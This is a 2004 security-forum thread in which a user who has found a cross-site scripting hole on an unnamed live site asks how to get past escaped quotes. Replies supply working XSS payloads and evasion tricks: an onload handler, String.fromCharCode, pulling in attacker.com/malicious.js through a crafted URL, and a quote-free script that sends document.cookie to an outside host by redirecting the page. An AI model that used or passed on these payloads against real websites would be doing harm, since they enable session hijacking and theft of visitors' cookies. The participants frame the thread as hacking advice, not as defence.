 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 58
 Members: 0
 Total: 58
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Few Questions about XSS |
|
 Posted: Thu Jun 03, 2004 6:10 am |
 |
|
| x303 |
| Beginner |
 |
|
| Joined: May 31, 2004 |
| Posts: 3 |
|
|
|
 |
|
 |
|
I've found it in ?id=[XSS] . When i try <script>alert(document.cookie);</script> everything works fine. But when i try: <script>alert('Hello');</script> then in source code ( ' ) are replaced by ( \' ) and then nothing is working like it should 
So is there a way how to avoid this?
And another question, is it available to inject PHP script ?  |
|
|
|
|
|
hey |
|
| Posted: Thu Jun 03, 2004 6:33 am |
|
|
| icenix |
| Advanced user |
 |
|
| Joined: May 13, 2004 |
| Posts: 106 |
| Location: Australia |
|
|
|
|
|
|
try <script>alert("hello")</script>
plus i dont know why you would even want to anyway but yeah,
and no you cant Execute PHP Code through XSS.
your thinking of Remote file Inclusion..
or you can replace <script> all together
| Code: |
body onload=alert("hello");>
|
there are many many alternatives.
search the forum
hope i helped |
|
|
|
|
| Posted: Thu Jun 03, 2004 7:46 am |
|
|
| x303 |
| Beginner |
|
|
| Joined: May 31, 2004 |
| Posts: 3 |
|
|
|
|
|
|
|
I've tried ( " ) too, same thing happens. Well, maybe it's filtred 
Anyway thanx. Ive noticed that LOTS of sites arent filtring user input.. |
|
|
|
|
| Posted: Thu Jun 03, 2004 8:04 am |
|
|
| Tora |
| Regular user |
|
|
| Joined: May 19, 2004 |
| Posts: 9 |
| Location: Germany |
|
|
|
|
|
|
Hi
thats the effect from the php cofiguration "magic_quotes_gpc"
The magic_quotes_gpc configuration directive affects Get, Post and Cookie values. If turned on, value (It's "PHP!") will automagically become (It\'s \"PHP!\").
more info:
http://www.php.net/en/variables.external |
|
|
|
|
|
Re: Few Questions about XSS |
|
| Posted: Thu Jun 03, 2004 10:19 am |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| x303 wrote: | I've found it in ?id=[XSS] . When i try <script>alert(document.cookie);</script> everything works fine. But when i try: <script>alert('Hello');</script> then in source code ( ' ) are replaced by ( \' ) and then nothing is working like it should
So is there a way how to avoid this?
And another question, is it available to inject PHP script ? |
One way to solve the escaped single and double quotes problem is by using the String.fromCharCode() function in javascript, as shown here:
http://www.governmentsecurity.org/articles/HackingWithJavascript.php
And there are more possibilities, like make get request with additional concatenated string:
http://victim.com/some/script.php?mode=3&op=5&foobar=http://attacker.com/malicious.js
and then let your javascript do some string pattern matching search and substring operation on document.location and you can get long string without escaping probs. |
|
|
|
|
|
|
|
|
| Posted: Fri Jun 04, 2004 7:47 am |
|
|
| b0ilz |
| Regular user |
|
|
| Joined: May 31, 2004 |
| Posts: 10 |
|
|
|
|
|
|
|
Dont forget that you dont need to put any real javascript on the website. You can use remote scripts by using the src= attribute in many different methods. Also, javascript is not the only language you can use for xss.
Here is example of javascript that can steal a cookie without using any quotes. Also is the technique in that hackingwithjavascript paper. this is tested with mozilla 0.9.9:
var u = /http:site.com?/;
var x = u.source + document.cookie;
window.location=x; |
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
